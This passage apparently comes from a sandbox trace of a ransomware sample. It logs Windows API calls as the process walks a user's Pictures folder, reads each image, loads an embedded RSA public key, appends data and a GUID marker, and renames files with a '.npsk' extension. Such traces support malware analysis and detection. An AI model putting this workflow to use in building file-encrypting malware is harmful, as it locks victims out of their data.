Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.286] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.286] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.286] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7ac6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.286] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.287] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.287] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.287] CloseHandle (hObject=0x61c) returned 1 [0217.288] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OalHUV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\oalhuv.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OalHUV.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\oalhuv.gif.npsk")) returned 1 [0217.289] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa793af00, ftCreationTime.dwHighDateTime=0x1d5e56c, ftLastAccessTime.dwLowDateTime=0x6620d8f0, ftLastAccessTime.dwHighDateTime=0x1d5db6b, ftLastWriteTime.dwLowDateTime=0x6620d8f0, ftLastWriteTime.dwHighDateTime=0x1d5db6b, nFileSizeHigh=0x0, nFileSizeLow=0x18e91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUgv4-3R1pf4HYZ1.jpg", cAlternateFileName="OUGV4-~1.JPG")) returned 1 [0217.290] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OUgv4-3R1pf4HYZ1.jpg") returned=".jpg" [0217.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OUgv4-3R1pf4HYZ1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\ougv4-3r1pf4hyz1.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.291] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=102033) returned 1 [0217.291] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.293] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x18e6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.293] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.294] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x18e91, lpOverlapped=0x0) returned 1 [0217.295] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.295] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.295] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.295] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.296] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.296] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.296] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.296] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.296] GetLastError () returned 0x0 [0217.296] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.296] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.296] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.296] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.297] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.297] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.298] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x18e91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.298] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.298] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.298] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.298] CloseHandle (hObject=0x61c) returned 1 [0217.300] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OUgv4-3R1pf4HYZ1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\ougv4-3r1pf4hyz1.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\OUgv4-3R1pf4HYZ1.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\ougv4-3r1pf4hyz1.jpg.npsk")) returned 1 [0217.302] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae4bdd0, ftCreationTime.dwHighDateTime=0x1d5e478, ftLastAccessTime.dwLowDateTime=0xc2c876e0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0xc2c876e0, ftLastWriteTime.dwHighDateTime=0x1d5d97b, nFileSizeHigh=0x0, nFileSizeLow=0x16507, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rvjc.bmp", cAlternateFileName="")) returned 1 [0217.302] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\rvjc.bmp") returned=".bmp" [0217.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\rvjc.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\rvjc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.302] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=91399) returned 1 [0217.302] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.304] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x164e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.304] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.306] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x16507, lpOverlapped=0x0) returned 1 [0217.307] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.307] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.307] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.307] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.308] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.308] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.308] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.308] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.308] GetLastError () returned 0x0 [0217.309] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.309] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.309] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.309] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.309] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.309] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.310] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16507, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.310] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.310] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.310] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.310] CloseHandle (hObject=0x61c) returned 1 [0217.313] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\rvjc.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\rvjc.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\rvjc.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\rvjc.bmp.npsk")) returned 1 [0217.315] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc7487b0, ftCreationTime.dwHighDateTime=0x1d5e2b3, ftLastAccessTime.dwLowDateTime=0xca4d7820, ftLastAccessTime.dwHighDateTime=0x1d5e1e6, ftLastWriteTime.dwLowDateTime=0xca4d7820, ftLastWriteTime.dwHighDateTime=0x1d5e1e6, nFileSizeHigh=0x0, nFileSizeLow=0x5306, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tPAKjGwgJdU.bmp", cAlternateFileName="TPAKJG~1.BMP")) returned 1 [0217.315] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\tPAKjGwgJdU.bmp") returned=".bmp" [0217.315] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\tPAKjGwgJdU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\tpakjgwgjdu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.315] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=21254) returned 1 [0217.315] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.317] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x52e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.318] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.320] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x5306, lpOverlapped=0x0) returned 1 [0217.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.321] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0217.322] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.322] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.322] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.322] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.322] GetLastError () returned 0x0 [0217.322] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.322] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0217.322] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.322] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.322] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.322] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.323] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5306, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.323] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.323] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.323] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.323] CloseHandle (hObject=0x61c) returned 1 [0217.325] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\tPAKjGwgJdU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\tpakjgwgjdu.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\tPAKjGwgJdU.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\tpakjgwgjdu.bmp.npsk")) returned 1 [0217.327] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f187170, ftCreationTime.dwHighDateTime=0x1d5da43, ftLastAccessTime.dwLowDateTime=0xe41695c0, ftLastAccessTime.dwHighDateTime=0x1d5e1a0, ftLastWriteTime.dwLowDateTime=0xe41695c0, ftLastWriteTime.dwHighDateTime=0x1d5e1a0, nFileSizeHigh=0x0, nFileSizeLow=0xe24c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZbcCxQj6QJgfyZ9_L.png", cAlternateFileName="YZBCCX~1.PNG")) returned 1 [0217.327] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\YZbcCxQj6QJgfyZ9_L.png") returned=".png" [0217.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\J6W_22\\YZbcCxQj6QJgfyZ9_L.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\j6w_22\\yzbccxqj6qjgfyz9_l.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.328] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=57932) returned 1 [0217.328] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.329] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe226, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.329] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.331] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xe24c, lpOverlapped=0x0) returned 1 [0217.332] lstrlenA (lpString="-----BEGIN PUBLIC 